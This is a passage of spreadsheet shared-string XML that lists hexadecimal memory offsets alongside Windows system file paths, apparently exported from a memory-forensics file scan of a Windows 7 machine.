    <t>\Windows\System32\P2P.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefb948</t>
  </si>
  <si>
    <t>0xdeefbac8</t>
  </si>
  <si>
    <t>0xdeefbc80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Entity\3.5.0.0__b77a5c561934e089\System.Web.Entity.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdeefbda0</t>
  </si>
  <si>
    <t>\Windows\System32\p2pnetsh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefc130</t>
  </si>
  <si>
    <t>\Windows\inf\netserv.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefc1e8</t>
  </si>
  <si>
    <t>\Windows\inf\netip6.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefc2a0</t>
  </si>
  <si>
    <t>\Windows\System32\wwancfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefc488</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\nshhttp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefc658</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-rasbase_31bf3856ad364e35_6.1.7601.17514_none_0</t>
  </si>
  <si>
    <t>fe7d1ccd8b15e</t>
  </si>
  <si>
    <t>24.manifest</t>
  </si>
  <si>
    <t>0xdeefc840</t>
  </si>
  <si>
    <t>0xdeefc8f8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{D34BA85B-2AE3-406F-84A</t>
  </si>
  <si>
    <t>3-26193E66BB3</t>
  </si>
  <si>
    <t>4}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefce60</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{D138264C-0B38-472A-9EF</t>
  </si>
  <si>
    <t>E-90D3ED157D6</t>
  </si>
  <si>
    <t>1}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefcf80</t>
  </si>
  <si>
    <t>0xdeefd038</t>
  </si>
  <si>
    <t>\Windows\System32\wlancfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefd168</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fwcfg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefdac0</t>
  </si>
  <si>
    <t>\Windows\System32\wlanhlp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefdb78</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-wmi-cmiplugin_31bf3856ad364e35_6.1.7601.17514_</t>
  </si>
  <si>
    <t>none_bf09f6d2</t>
  </si>
  <si>
    <t>8a49e5c1.ma</t>
  </si>
  <si>
    <t>nifest</t>
  </si>
  <si>
    <t>0xdeefe038</t>
  </si>
  <si>
    <t>\Windows\inf\netbrdgm.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefe610</t>
  </si>
  <si>
    <t>\Windows\inf\netpgm.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefe958</t>
  </si>
  <si>
    <t>0xdeefeb40</t>
  </si>
  <si>
    <t>\Windows\inf\lltdio.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefecb0</t>
  </si>
  <si>
    <t>\Windows\inf\netavpnt.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefee00</t>
  </si>
  <si>
    <t>\Windows\inf\netavpna.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefef80</t>
  </si>
  <si>
    <t>\Windows\inf\errata.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeffa68</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wercplsupport.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeffe10</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\EAPQEC.DLL.MUI_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeeffec8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\p2pnetsh.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeefff80</t>
  </si>
  <si>
    <t>\Windows\inf\netrass.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef04130</t>
  </si>
  <si>
    <t>\Windows\Fonts\malgunbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef04760</t>
  </si>
  <si>
    <t>\Windows\Fonts\vgafix.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef04b68</t>
  </si>
  <si>
    <t>\Windows\Fonts\ega40woa.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef04d48</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeuib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef04f80</t>
  </si>
  <si>
    <t>0xdef07600</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpRTP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef07748</t>
  </si>
  <si>
    <t>\Windows\System32\tcpmon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef081e0</t>
  </si>
  <si>
    <t>\Windows\inf\netnwifi.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef08570</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFramework.Aero\3.0.0.0__31bf3856ad364e35\PresentationFr</t>
  </si>
  <si>
    <t>amework.Aero.</t>
  </si>
  <si>
    <t>0xdef08890</t>
  </si>
  <si>
    <t>0xdef08d58</t>
  </si>
  <si>
    <t>\Windows\System32\PrintIsolationProxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef0c250</t>
  </si>
  <si>
    <t>0xdef0d638</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.Printing\3.0.0.0__31bf3856ad364e35\System.Printing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef0dbc8</t>
  </si>
  <si>
    <t>0xdef0e1f8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Drawing.Design\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.Desi</t>
  </si>
  <si>
    <t>gn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef0e8f0</t>
  </si>
  <si>
    <t>0xdef10590</t>
  </si>
  <si>
    <t>0xdef107a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms</t>
  </si>
  <si>
    <t>0xdef11038</t>
  </si>
  <si>
    <t>\Windows\inf\setupapi.app.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef113a0</t>
  </si>
  <si>
    <t>\Windows\System32\wshnetbs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef11558</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\INFCACHE.1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef11758</t>
  </si>
  <si>
    <t>\Windows\inf\ndiscap.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef11f80</t>
  </si>
  <si>
    <t>\Windows\System32\iertutil.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef125a0</t>
  </si>
  <si>
    <t>\Windows\inf\dwup.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef12658</t>
  </si>
  <si>
    <t>\Windows\inf\fontsetup.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef12858</t>
  </si>
  <si>
    <t>\Windows\inf\defltbase.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef12ca0</t>
  </si>
  <si>
    <t>0xdef12f80</t>
  </si>
  <si>
    <t>\Windows\inf\apps.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef13bb0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB18.tmp\System.Workflow.Activities.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef13e68</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualC\3904875371437488625e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef14d38</t>
  </si>
  <si>
    <t>\Windows\System32\msacm32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef14f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.UI\6.1.0.0__31bf3856ad364e35\Microsoft.MediaC</t>
  </si>
  <si>
    <t>enter.UI.dll_x001B_</t>
  </si>
  <si>
    <t>0xdef15b80</t>
  </si>
  <si>
    <t>0xdef15f80</t>
  </si>
  <si>
    <t>\Windows\System32\taskhost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef17990</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-netbios_31bf3856ad364e35_6.1.7600.16385_none_5</t>
  </si>
  <si>
    <t>9b80e4dcc72e4</t>
  </si>
  <si>
    <t>31.manifest</t>
  </si>
  <si>
    <t>0xdef18038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFramework.Luna\3.0.0.0__31bf3856ad364e35\PresentationFr</t>
  </si>
  <si>
    <t>amework.Luna.</t>
  </si>
  <si>
    <t>0xdef180f0</t>
  </si>
  <si>
    <t>0xdef185f0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef186a8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xaml\v4.0_4.0.0.0__b77a5c561934e089\System.Xam</t>
  </si>
  <si>
    <t>0xdef18760</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\S</t>
  </si>
  <si>
    <t>ystem.Windows</t>
  </si>
  <si>
    <t>.Forms.dll_x001B_</t>
  </si>
  <si>
    <t>0xdef18f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\Syste</t>
  </si>
  <si>
    <t>m.Data.Linq.d</t>
  </si>
  <si>
    <t>0xdef19350</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{BD1F9D8A-B2AB-462E-9C4</t>
  </si>
  <si>
    <t>2-0C77EFC2A1D</t>
  </si>
  <si>
    <t>9}_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef19498</t>
  </si>
  <si>
    <t>\Windows\System32\dimsjob.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef19770</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsBase\v4.0_4.0.0.0__31bf3856ad364e35\WindowsBas</t>
  </si>
  <si>
    <t>0xdef19a00</t>
  </si>
  <si>
    <t>0xdef19b20</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced300-6e01-11de-8bed-001e0bcd1824}.TxR.blf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef19de0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF815.tmp\PresentationFramework.Royale.dll</t>
  </si>
  <si>
    <t>0xdef1a038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\SMDiagnostics\3.0.0.0__b77a5c561934e089\SMdiagnostics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1a380</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\5466315b763447b92b6b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1a4c8</t>
  </si>
  <si>
    <t>0xdef1a580</t>
  </si>
  <si>
    <t>0xdef1a760</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\cbd86593e7216eb679dadc23cc3afc14</t>
  </si>
  <si>
    <t>\CustomMarsha</t>
  </si>
  <si>
    <t>lers.ni.dll</t>
  </si>
  <si>
    <t>0xdef1a898</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\SMSvcHost\083cb34fa4d7b3a972fb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1a9e8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomM</t>
  </si>
  <si>
    <t>arshalers.dll</t>
  </si>
  <si>
    <t>0xdef1ab68</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Workflow.Runtime\3.0.0.0__31bf3856ad364e35\System.Workflow.R</t>
  </si>
  <si>
    <t>0xdef1ac20</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll_x001B_[0K_x001B_[121G</t>
  </si>
  <si>
    <t>0xdef1b1b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lpremove.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1b328</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{9B2FEC60-8922-40AA-964</t>
  </si>
  <si>
    <t>6-5F6E656A6A3</t>
  </si>
  <si>
    <t>0xdef1b3f8</t>
  </si>
  <si>
    <t>0xdef1b4b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessib</t>
  </si>
  <si>
    <t>0xdef1b568</t>
  </si>
  <si>
    <t>0xdef1b9d8</t>
  </si>
  <si>
    <t>0xdef1ba90</t>
  </si>
  <si>
    <t>0xdef1be18</t>
  </si>
  <si>
    <t>0xdef1c3e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WinSATAPI.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1caa0</t>
  </si>
  <si>
    <t>\Windows\System32\WinSATAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1cbc0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000</t>
  </si>
  <si>
    <t>.000_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1cc98</t>
  </si>
  <si>
    <t>0xdef1d428</t>
  </si>
  <si>
    <t>\Windows\Resources\Themes\Aero\en-US\aero.msstyles.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1d798</t>
  </si>
  <si>
    <t>\Windows\Resources\Themes\Aero\aero.msstyles_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1e038</t>
  </si>
  <si>
    <t>0xdef1e380</t>
  </si>
  <si>
    <t>0xdef1e6e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayerconfiguration_537e287f67955d9</t>
  </si>
  <si>
    <t>0xdef1e798</t>
  </si>
  <si>
    <t>0xdef1f0d8</t>
  </si>
  <si>
    <t>\Windows\System32\xolehlp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1f330</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\Sessions.back.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef1f3e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System\4ad0c43b7c3d76c0c58b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef20298</t>
  </si>
  <si>
    <t>0xdef20808</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Security\b1da5dd2feb01fb3d7d8310f4d13f699\</t>
  </si>
  <si>
    <t>System.Securi</t>
  </si>
  <si>
    <t>ty.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef21038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e8980cc30db74aebb06ed60c8b93c295\mscorli</t>
  </si>
  <si>
    <t>b.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef211b8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\7649edb37b85f0a9d40d1285e4c362cf\Ac</t>
  </si>
  <si>
    <t>cessibility.n</t>
  </si>
  <si>
    <t>0xdef21270</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Design\0ccc87991129cedaf9207df3d0581563\Sy</t>
  </si>
  <si>
    <t>stem.Design.n</t>
  </si>
  <si>
    <t>0xdef21328</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\396a362ee6718a61ff200b6ef460</t>
  </si>
  <si>
    <t>0529\System.W</t>
  </si>
  <si>
    <t>eb.Applicat</t>
  </si>
  <si>
    <t>ionSer</t>
  </si>
  <si>
    <t>vices.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef214a8</t>
  </si>
  <si>
    <t>0xdef216c8</t>
  </si>
  <si>
    <t>0xdef21c50</t>
  </si>
  <si>
    <t>0xdef21d08</t>
  </si>
  <si>
    <t>0xdef21e88</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System\61f348ceef57c0d703d2bd52f7a33f92\System.ni</t>
  </si>
  <si>
    <t>0xdef223e8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DynamicData.Design\v4.0_4.0.0.0__31bf3856a</t>
  </si>
  <si>
    <t>m.Web.Dynam</t>
  </si>
  <si>
    <t>icData</t>
  </si>
  <si>
    <t>.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef22658</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ipsecsnp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef22b60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Runtime.Caching.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef22e48</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2100b9d13b4ca278f1a51706915b</t>
  </si>
  <si>
    <t>bc85\System.C</t>
  </si>
  <si>
    <t>onfiguratio</t>
  </si>
  <si>
    <t>n.ni.d</t>
  </si>
  <si>
    <t>0xdef275d8</t>
  </si>
  <si>
    <t>0xdef27690</t>
  </si>
  <si>
    <t>\Windows\System32\AudioSes.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef27750</t>
  </si>
  <si>
    <t>0xdef28310</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00d.inf_x86_neutral_18a2362487e9d14a\wiaca00</t>
  </si>
  <si>
    <t>0xdef283c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_lv-lv_4fea1c1c70e881b7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef287b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_lt-lt_4fea189870e886c7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef28b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_logfiles_wudf_082845cc19e06817.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef28e30</t>
  </si>
  <si>
    <t>0xdef28f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_logfiles_windows_portable_devices_dcf2285bde880198.cdf-ms</t>
  </si>
  <si>
    <t>0xdef29650</t>
  </si>
  <si>
    <t>\Users\Public\Videos\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef2a280</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Crypto\RSA\MachineKeys\f686aace6942fb7f7ceb231212eef4a4_365abb72-f240-4</t>
  </si>
  <si>
    <t>5fe-be90-41a8</t>
  </si>
  <si>
    <t>b2626d97_x001B_[0</t>
  </si>
  <si>
    <t>0xdef2a4a0</t>
  </si>
  <si>
    <t>0xdef2a5c0</t>
  </si>
  <si>
    <t>0xdef2a8f0</t>
  </si>
  <si>
    <t>0xdef2a9a8</t>
  </si>
  <si>
    <t>0xdef2ac50</t>
  </si>
  <si>
    <t>0xdef2af80</t>
  </si>
  <si>
    <t>0xdef2b920</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.IdentityModel\3.0.0.0__b77a5c561934e089\System.IdentityModel</t>
  </si>
  <si>
    <t>0xdef2ba40</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\C</t>
  </si>
  <si>
    <t>iAB0002.000_x001B_[</t>
  </si>
  <si>
    <t>0xdef2bb90</t>
  </si>
  <si>
    <t>0xdef2bf80</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpClient.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef2c038</t>
  </si>
  <si>
    <t>\Windows\System32\tquery.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef2c220</t>
  </si>
  <si>
    <t>\Windows\System32\UXInit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef2ceb8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\S</t>
  </si>
  <si>
    <t>ETTINGS.DIA_x001B_[</t>
  </si>
  <si>
    <t>0xdef2d5b8</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\powershell.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef2df38</t>
  </si>
  <si>
    <t>\Windows\System32\PeerDistSvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef303d8</t>
  </si>
  <si>
    <t>0xdef30880</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPB061.tmp\PresentationCFFRasterizer.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef30ef0</t>
  </si>
  <si>
    <t>0xdef314b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef31620</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mcupdate\6.1.0.0__31bf3856ad364e35\mcupdate.exe_x001B_[0K_x001B_[73G</t>
  </si>
  <si>
    <t>0xdef316f0</t>
  </si>
  <si>
    <t>\Windows\Performance\WinSAT\DataStore\2019-03-09 06.47.28.247 Formal.Assessment (Recent).WinSA</t>
  </si>
  <si>
    <t>T.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef31868</t>
  </si>
  <si>
    <t>0xdef31920</t>
  </si>
  <si>
    <t>.001_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef33430</t>
  </si>
  <si>
    <t>0xdef33760</t>
  </si>
  <si>
    <t>0xdef33818</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\ef0bb1f7691db3f2fd2492d2b3131a18\R</t>
  </si>
  <si>
    <t>eachFramework</t>
  </si>
  <si>
    <t>0xdef338d0</t>
  </si>
  <si>
    <t>0xdef33bc8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef33c88</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\f524cd754f314e62de73cf7ae6e1f610\Syste</t>
  </si>
  <si>
    <t>m.Xml.ni.dll.</t>
  </si>
  <si>
    <t>0xdef33f80</t>
  </si>
  <si>
    <t>0xdef34200</t>
  </si>
  <si>
    <t>0xdef34428</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\da297ab9c8b383337d33fb47858522cc\S</t>
  </si>
  <si>
    <t>ystem.Dynamic</t>
  </si>
  <si>
    <t>0xdef34598</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\113c3bb44f2ae91e9ec2ca990ec6</t>
  </si>
  <si>
    <t>73f7\Presenta</t>
  </si>
  <si>
    <t>rk.Cla</t>
  </si>
  <si>
    <t>ssic.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef34b68</t>
  </si>
  <si>
    <t>0xdef35038</t>
  </si>
  <si>
    <t>0xdef35268</t>
  </si>
  <si>
    <t>0xdef35320</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\49ce7e43241223c614e8b06b02da</t>
  </si>
  <si>
    <t>e677\Microsof</t>
  </si>
  <si>
    <t>ic.ni.</t>
  </si>
  <si>
    <t>0xdef354c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\44a58b3534ae10a67a9bee6c6ad1226</t>
  </si>
  <si>
    <t>b\System.Depl</t>
  </si>
  <si>
    <t>oyment.ni.d</t>
  </si>
  <si>
    <t>0xdef35650</t>
  </si>
  <si>
    <t>0xdef35a70</t>
  </si>
  <si>
    <t>0xdef35e10</t>
  </si>
  <si>
    <t>ssic.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef36258</t>
  </si>
  <si>
    <t>0xdef36798</t>
  </si>
  <si>
    <t>0xdef36900</t>
  </si>
  <si>
    <t>0xdef36ca8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\1d284dc67f91034dc253ed4d7a3e4ef0\Syst</t>
  </si>
  <si>
    <t>em.Core.ni.dl</t>
  </si>
  <si>
    <t>0xdef375e8</t>
  </si>
  <si>
    <t>0xdef37a08</t>
  </si>
  <si>
    <t>0xdef37d18</t>
  </si>
  <si>
    <t>0xdef37dd0</t>
  </si>
  <si>
    <t>m.Xml.ni.dll_x001B_</t>
  </si>
  <si>
    <t>0xdef37f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\53b7391639d64d7d1e07d69fa2f73185</t>
  </si>
  <si>
    <t>\Microsoft.CS</t>
  </si>
  <si>
    <t>harp.ni.dll</t>
  </si>
  <si>
    <t>0xdef38038</t>
  </si>
  <si>
    <t>0xdef381f0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\f27cddae9bf193c59f244722a8397853\Wind</t>
  </si>
  <si>
    <t>owsBase.ni.dl</t>
  </si>
  <si>
    <t>0xdef38640</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3fab248c5cf4f87b46d5a02d4abd</t>
  </si>
  <si>
    <t>8dfd\System.R</t>
  </si>
  <si>
    <t>untime.Remo</t>
  </si>
  <si>
    <t>ting.n</t>
  </si>
  <si>
    <t>0xdef38878</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\b27561826f219d3833e424ce7b5917d5</t>
  </si>
  <si>
    <t>Core.ni.dll</t>
  </si>
  <si>
    <t>0xdef38bc8</t>
  </si>
  <si>
    <t>0xdef38f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF5B2.tmp\PresentationFramework.Luna.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef39038</t>
  </si>
  <si>
    <t>0xdef39850</t>
  </si>
  <si>
    <t>0xdef39c80</t>
  </si>
  <si>
    <t>0xdef39e10</t>
  </si>
  <si>
    <t>0xdef3a150</t>
  </si>
  <si>
    <t>0xdef3a4d0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehiUserXp\6.1.0.0__31bf3856ad364e35\ehiUserXp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3aa70</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\0c7c7e947d6b08121acb2a5a97ea0b</t>
  </si>
  <si>
    <t>1b\System.Dat</t>
  </si>
  <si>
    <t>a.SqlXml.ni</t>
  </si>
  <si>
    <t>0xdef3ad60</t>
  </si>
  <si>
    <t>0xdef3af80</t>
  </si>
  <si>
    <t>0xdef3b298</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MsMpLics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3b350</t>
  </si>
  <si>
    <t>0xdef3b4c0</t>
  </si>
  <si>
    <t>nq.ni.dll.a</t>
  </si>
  <si>
    <t>0xdef3b578</t>
  </si>
  <si>
    <t>0xdef3b6b0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\0e763dbb5fdc824ab2231262b5ba0ce</t>
  </si>
  <si>
    <t>b\System.Mana</t>
  </si>
  <si>
    <t>gement.ni.d</t>
  </si>
  <si>
    <t>0xdef3b7e8</t>
  </si>
  <si>
    <t>0xdef3b8a0</t>
  </si>
  <si>
    <t>0xdef3b9e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEA2B.tmp\Microsoft.Security.ApplicationId</t>
  </si>
  <si>
    <t>0xdef3bc90</t>
  </si>
  <si>
